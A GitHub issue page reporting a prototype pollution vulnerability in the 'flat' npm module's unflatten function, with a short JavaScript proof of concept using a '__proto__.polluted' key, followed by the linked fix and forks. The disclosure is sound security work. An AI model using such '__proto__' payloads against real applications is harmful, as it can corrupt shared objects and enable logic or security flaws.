Skip to content
New issue

Have a question about this project? # for a free GitHub account to open an issue and contact its maintainers and the community.

#

By clicking “#”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? # to your account

Jump to bottom

Prototype Pollution #105

Closed
po6ix opened this issue Jul 18, 2020 · 1 comment · Fixed by #106
Closed

Prototype Pollution #105

po6ix opened this issue Jul 18, 2020 · 1 comment · Fixed by #106

Comments

@po6ix
Copy link

po6ix commented Jul 18, 2020

This module has prototype pollution vulnerablity
and it can make logic vulnerability in application use this

var unflatten = require('flat').unflatten;

unflatten({
    '__proto__.polluted': true
});

console.log(polluted); // true
@MatthiasKunnen MatthiasKunnen mentioned this issue Jul 21, 2020
Merged
timoxley pushed a commit that referenced this issue Aug 6, 2020
@MatthiasKunnen @timoxley
Fix prototype pollution on unflatten
20ef0ef 
Fixes #105.
@989919259920
Copy link

خوب و عالی و بهتر است

@sayoojbkumar sayoojbkumar mentioned this issue Dec 19, 2021
Closed
@eagafonov eagafonov mentioned this issue Jan 10, 2023
Closed
jiongle1 pushed a commit to scantist-ossops-m2/flat that referenced this issue Apr 7, 2024
@MatthiasKunnen @timoxley
Fix prototype pollution on unflatten
5a7c5b8 
Fixes hughsk#105.
@debricked debricked bot mentioned this issue Apr 20, 2024
Open
# for free to join this conversation on GitHub. Already have an account? # to comment
Assignees
No one assigned
Labels
None yet
Projects
None yet
Milestone
No milestone
Development

Successfully merging a pull request may close this issue.

Fix prototype pollution in unflatten
2 participants
@po6ix @989919259920